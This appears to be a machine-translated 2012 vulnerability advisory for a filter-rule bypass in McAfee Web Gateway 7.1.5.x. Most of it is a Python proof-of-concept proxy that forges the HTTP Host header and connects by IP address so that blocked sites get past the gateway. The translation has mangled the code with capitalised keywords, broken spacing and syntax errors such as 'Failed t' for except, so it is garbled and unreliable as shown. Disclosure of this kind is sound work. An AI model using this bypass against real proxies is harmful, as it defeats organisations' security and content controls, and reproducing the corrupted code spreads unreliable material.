Release date: 2012-04-16
Updated on: 2012-04-17
Affected Systems:
McAfee Web Gateway 7.1.5.2
McAfee Web Gateway 7.1.5.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53015
The McAfee Web Gateway device provides comprehensive security protection for Web 2.0 traffic.
McAfee Web Gateway has a security vulnerability in the implementation of filter rules. Successful attacks allow attackers to bypass certain security restrictions.
<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test methods:
Import socket, struct, sys, time
From threading import Thread
# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy get the Host field of the http header and do not verify anything else.
# It trusts on the HTTP Header and it can be modified by the attacker.
TimeOut = 0.8
IsGet = 0
HostNameG = ""
PacoteGet = ""
Port = 8080 # Listening port
ProxyAddr = "vulnerableProxy.com" # vulnerable proxy
ProxyPort = 8080 # proxy port
Def handle (client, globalSock ):
Client. settimeout (timeOut)
Global hostNameG
While 1:
Dados = ""
Tam = 0
While 1:
Try:
Dados2 = client. recv (1024)
Tam = tam + len (dados2)
Dados = dados + dados2
Failed t socket. timeout:
Break
Dd = dados. find ("CONNECT") # if the packet is a CONNECT METHOD
If dd! =-1:
Dd2 = dados. find (":")
HostName = dados [dd + 8: dd2]
IpAddr = socket. gethostbyname (hostName) # changing the method to connect to the ip address, not the dns domain
Pacote = dados
HostHeader = "Host:" + hostName
Pacote = pacote. replace (hostHeader, "Host: www.uol.com.br") # changing the host field with a value that is accepted by the proxy
Pacote = pacote. replace (hostName, ipAddr) # changind domain for ip
Dados = pacote
Getd = dados. find ("GET ")
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)
HostName = dados [getd2 + 2: getd3]
If getd! =-1:
GlobalSock. close ()
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)
HostName = dados [getd2 + 2: getd3]
ProxyAuth = ""
ProxyAuthN = dados. find ("Proxy-Authorization :")
If proxyAuthN! =-1:
ProxyAuthNN = dados. find ("\ r \ n", proxyAuthN)
ProxyAuth = dados [proxyAuthN: proxyAuthNN]
IpAddr = socket. gethostbyname (hostName)
Info = "CONNECT" + ipAddr + ": 80 HTTP/1.1 \ r \ n"
If proxyAuthN! =-1:
Info + = proxyAuth + "\ r \ n"
Info + = "Host: www.uol.com.br \ r \ n"
GlobalSock. send (info)
Tam = 0
Gdata = ""
While 1:
Try:
Gdata2 = globalSock. recv (1024)
Tam = tam + len (gdata2)
Gdata = gdata + gdata2
If len (gdata2) = 0:
Break
Failed t socket. timeout:
Break
GlobalSock. send (dados)
Tam = 0
Gdata = ""
While 1:
Try:
Gdata2 = globalSock. recv (1024)
If len (gdata2)> 0:
Client. send (gdata2)
Tam = tam + len (gdata2)
Gdata = gdata + gdata2
If len (gdata2) = 0:
Break
Failed t socket. timeout:
Break
Print 'proxy bypass'
Print 'by Gabriel Menezes Nunes'
Print 'Tested on McAfee Web Gateway 7 and Squid proxy'
Sockzao = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print 'attacked Proxy :',
Print proxyAddr
Print 'listening on ',
Print port
Sockzao. bind ("", port ))
Sockzao. listen (6)
While 1:
Print 'Waiting for ONS ons'
Client, address = sockzao. accept ()
Print 'client connected'
Print address
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)
T = Thread (target = handle, args = (client, globalSock ,))
T. start ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
McAfee
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.mcafee.com/